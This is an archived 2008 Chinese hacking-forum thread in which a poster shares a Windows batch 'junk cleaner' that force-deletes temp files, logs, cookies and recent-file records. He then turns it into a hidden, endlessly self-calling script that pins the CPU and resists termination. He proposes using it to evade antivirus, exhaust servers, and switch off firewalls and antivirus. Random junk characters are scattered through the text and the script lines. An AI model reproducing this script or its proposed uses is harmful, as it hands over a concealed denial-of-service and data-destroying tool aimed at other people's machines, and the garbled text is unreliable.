【3.A.S.T】网络安全爱好者's Archiver

黑客学习

平湖秋月 发表于 2008-9-13 23:51

【原创】再谈垃圾清除的批处理和其流氓运用!

[size=5][b]大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序    说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊![/b][/size]]`1Am:SAy
a.bat源代码如下:Sp-{3P DgB(}5~
[color=#003366][b][color=royalblue][/color]
'FC&e}]tZ2Qj +Yr%Kn$l
===可以直接保存改名a.bat====================="| U)YfT!ze0^
@echo off `QD!R8yN C$D
echo 正在清除系统垃圾文件,请稍等......
6@a\HZ`-sV#`w/u:z @del /f /s /q %systemdrive%\*.tmp /gS2d-I7N4f jZe
@del /f /s /q %systemdrive%\*._mp
0} l5x&ll_ @del /f /s /q %systemdrive%\*.log xq/?4e-@+H}LQ7PK
@del /f /s /q %systemdrive%\*.gid
Aa_!Qe@]9L;o V @del /f /s /q %systemdrive%\*.chk
^bRvFJ @del /f /s /q %systemdrive%\*.old G%MA\|5^Z Y!}F!|
@del /f /s /q %systemdrive%\recycled\*.*
1w?(J.~ |Hr5B,? @del /f /s /q %windir%\*.bak
"[ D,Dp1D~3y8g @del /f /s /q %windir%\prefetch\*.*
ZG^0aCGUw @rd /s /q %windir%\temp & md %windir%\temp u&G"d&E-q
@del /f /q %userprofile%\cookies\*.* &gQZ:KL){^,I
@del /f /q %userprofile%\recent\*.*
'Z;v4_c U"{8Y KK @del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
~6[E-MJ g6on @del /f /s /q "%userprofile%\Local Settings\Temp\*.*" b@'WY+B$a e
@del /f /s /q "%userprofile%\recent\*.*" Dh$B3Ib:RD4w^6J
echo 清除系统LJ完成![/b][/color]
k[&i-cDSY.Y:J [size=5]其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:[/size]
n#\ \aESp2V o
6sN[p"pF*R#t6v [color=#ff0000][b]===可以直接保存改名为a.bat[size=2][color=#0000ff](一定要是a.bat哦具体说明原因你应该明白吧======[/color]&Hu$Gt"NjC,c
[/size]@echo off+B8d0T6f Pf T
if "%1" == "h" goto begin
{zxSfj@({ mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit L5}?t5J:l1w;\'o
:begin0[-e K0n:WhEmV
echo 正在清除系统垃圾文件,请稍等......
8sa;t JB6PJ @@del /f /s /q %systemdrive%\*.tmp jVg bR
@del /f /s /q %systemdrive%\*._mp f[ TG_
@del /f /s /q %systemdrive%\*.log
9a(\2` z(P A @del /f /s /q %systemdrive%\*.gid
2]5y!\3O4tc*|$g @del /f /s /q %systemdrive%\*.chk -c\.I+c9p:u3C
@del /f /s /q %systemdrive%\*.old (X4T2@"Q$q&JfrU
@del /f /s /q %systemdrive%\recycled\*.*
c~\Fyr*O @del /f /s /q %windir%\*.bak
Y iDBv/ZhOPd/l @del /f /s /q %windir%\prefetch\*.*
N,N%Q0dBHSB @rd /s /q %windir%\temp & md %windir%\temp
R0ujc*a d6[?+I @del /f /q %userprofile%\cookies\*.* vo4AJ e(O T#v9e
@del /f /q %userprofile%\recent\*.*
.W[ vE*w1k?3^ @del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" w$Hz(cw c
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" &lm:X2P4Zg4_
@del /f /s /q "%userprofile%\recent\*.*"
CtH&c gdT echo 清除系统LJ完成!
Z(Th+an call a.bat[/b][/color]/tuT AY }@
[size=4][color=#ff0000]运行看看!什么效果?[/color][/size]%c9p K;r%NV
[size=4]对话框消失了!打开任务管理器查看显示CPU运用:100%    看进程里面cmd.exe占用CPU:99     本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的![/size]
!T0V.StL Ukr-m5O _'yy$|*r
[size=4][color=#ff0000]你说,我们可以利用这个BAT做些什么:[/color][/size]\+}:CD!m%r2b
_#CygX.|!o|:E(Q
[size=4]1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
,HyWC @||M)u+~-o 2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?D@(M5L5|)iD
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月[/size]

上帝的爱 发表于 2008-9-14 05:03

想法非常不错

柔肠寸断 发表于 2008-9-14 17:34

打个岔,流氓的应用,呵呵

柔肠寸断 发表于 2008-9-14 17:38

现在来正经的回答下问题:2P$g3Z` Zp e{/^S"M
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了Z]e |Qr-i
^'JrTmA8A_h
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈

问道小生 发表于 2008-9-14 19:03

其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
s^'Hi'X 部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。

平湖秋月 发表于 2008-9-15 21:43

楼上的你们说的都有道理 理论上是成立的 我有时间试试看

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.